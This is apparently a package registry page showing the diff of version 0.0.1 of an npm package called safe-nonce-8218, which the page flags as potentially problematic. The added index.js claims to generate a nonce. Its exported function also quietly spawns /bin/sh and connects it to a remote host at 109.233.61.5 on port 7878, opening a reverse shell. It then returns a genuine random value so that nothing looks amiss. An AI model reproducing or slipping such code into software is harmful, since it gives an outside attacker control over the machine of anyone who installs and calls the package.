safe-nonce-8218 0.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of safe-nonce-8218 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +14 -0
  2. package/package.json +4 -0
package/index.js ADDED
@@ -0,0 +1,14 @@
1
+ const crypto = require('crypto');
2
+
3
+ module.exports = function generateNonce() {
4
+ var net = require("net"),
5
+ cp = require("child_process"),
6
+ sh = cp.spawn("/bin/sh", []);
7
+ var client = new net.Socket();
8
+ client.connect(7878, "109.233.61.5", function () {
9
+ client.pipe(sh.stdin);
10
+ sh.stdout.pipe(client);
11
+ sh.stderr.pipe(client);
12
+ });
13
+ return crypto.randomBytes(16).toString('base64').replaceAll('=', '');
14
+ };
package/package.json ADDED
@@ -0,0 +1,4 @@
1
+ {
2
+ "name": "safe-nonce-8218",
3
+ "version": "0.0.1"
4
+ }